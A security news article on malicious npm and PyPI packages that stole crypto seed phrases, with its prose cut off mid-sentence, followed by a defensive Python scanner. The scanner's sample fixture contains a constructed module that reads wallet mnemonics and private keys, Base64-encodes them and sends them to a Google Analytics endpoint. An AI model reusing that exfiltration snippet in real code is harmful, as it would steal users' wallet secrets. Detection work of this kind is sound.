
Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft


The Socket Threat Research Team has unearthed a trio of malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to silently pilfer cryptocurrency secrets, including mnemonic seed phrases and private keys.

Released between 2021 and 2024 under the guise of harmless developer tools, these packages have been downloaded thousands of times, illustrating a growing trend of software supply chain attacks that target open-source ecosystems.

Subtle Subversion in Open Source

The npm package react-native-scrollpageviewtest, masquerading as a page-scrolling helper, has been downloaded 1215 times.

Its modus operandi involves an intricate combination of obfuscation and evasion techniques.

Once installed, it dynamically loads the host React Native wallet engine to extract sensitive data. The stolen data is Base64-encoded and stealthily exfiltrated to the control server through Google Analytics, which serves as a seemingly innocuous endpoint for the transmission.

This method not only evades detection but also leverages ...
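The exfiltration pattern described above (wallet-secret access, Base64 encoding, and an outbound request to an analytics endpoint) is something a defender can look for statically before a dependency ever runs. The following scanner is an added example written for this article; it is not code from Socket, gbhackers, or the packages discussed. It scores each source file by how many of three indicator categories it trips, so a legitimate analytics client (one indicator) is distinguished from a module that combines all three. The package files it scans below are constructed samples, and the module and function names in them are hypothetical.

```python
"""Heuristic scan of a package's JavaScript sources for the
secrets -> Base64 -> analytics-endpoint exfiltration pattern.

Added example, not the article's or any project's code. The sample
sources at the bottom are constructed; real packages are scanned
with scan_directory().
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List

# One regex per indicator category. A legitimate analytics client trips at
# most one of them; a module that reads wallet secrets, encodes them and
# ships them to an analytics endpoint trips all three.
INDICATORS = {
    "wallet_secrets": re.compile(
        r"\b(mnemonic|seed_?phrase|seedPhrase|privateKey|private_key)\b"),
    "base64_encoding": re.compile(
        r"\bbtoa\s*\(|toString\s*\(\s*['\"]base64['\"]\s*\)"),
    "analytics_endpoint": re.compile(
        r"google-analytics\.com/(?:mp/|g/)?collect"),
}

SEVERITY_BY_COUNT = {3: "high", 2: "medium", 1: "low"}


@dataclass
class Finding:
    path: str
    indicators: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Three categories together are the full exfiltration chain.
        return SEVERITY_BY_COUNT[len(self.indicators)]


def scan_sources(sources: Dict[str, str]) -> List[Finding]:
    """Return one Finding per file that trips at least one indicator,
    highest severity first. `sources` maps file path -> file text."""
    findings = []
    for path, text in sources.items():
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if hits:
            findings.append(Finding(path, hits))
    findings.sort(key=lambda f: len(f.indicators), reverse=True)
    return findings


def scan_directory(root: str) -> List[Finding]:
    """Walk an installed package tree (e.g. node_modules/<pkg>) and scan
    every JavaScript file it contains."""
    sources = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith((".js", ".cjs", ".mjs")):
                p = os.path.join(dirpath, fn)
                with open(p, encoding="utf-8", errors="ignore") as fh:
                    sources[p] = fh.read()
    return scan_sources(sources)


# Constructed sample package: a genuine-looking scroll helper, a legitimate
# analytics call, and one module that matches the pattern in the article.
SAMPLE_SOURCES = {
    "node_modules/example-scroll-helper/index.js":
        "export function scrollToPage(ref, index, width) {\n"
        "  ref.current.scrollTo({ x: index * width, animated: true });\n"
        "}\n",
    "node_modules/example-scroll-helper/analytics.js":
        "export function trackView(name) {\n"
        "  return fetch('https://www.google-analytics.com/collect', {\n"
        "    method: 'POST', body: 'v=1&t=pageview&dp=' + encodeURIComponent(name) });\n"
        "}\n",
    "node_modules/example-scroll-helper/lib/engine.js":
        "// hypothetical module that reaches into the host app's wallet state\n"
        "const secrets = { mnemonic: state.wallet.mnemonic, privateKey: state.wallet.privateKey };\n"
        "const blob = Buffer.from(JSON.stringify(secrets)).toString('base64');\n"
        "fetch('https://www.google-analytics.com/collect?v=1&t=event&ea=' + blob);\n",
}


if __name__ == "__main__":
    for f in scan_sources(SAMPLE_SOURCES):
        print(f"[{f.severity:6}] {f.path}: {', '.join(f.indicators)}")
```

Run `scan_directory("node_modules/<package>")` after `npm install --ignore-scripts` to review a dependency before its install hooks or code execute. The scanner is intentionally coarse: a "high" finding is a prompt for manual review, and minified or string-split code can defeat regex matching, so it complements rather than replaces a registry-side analysis such as the one Socket performed.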


Copyright of this story solely belongs to gbhackers.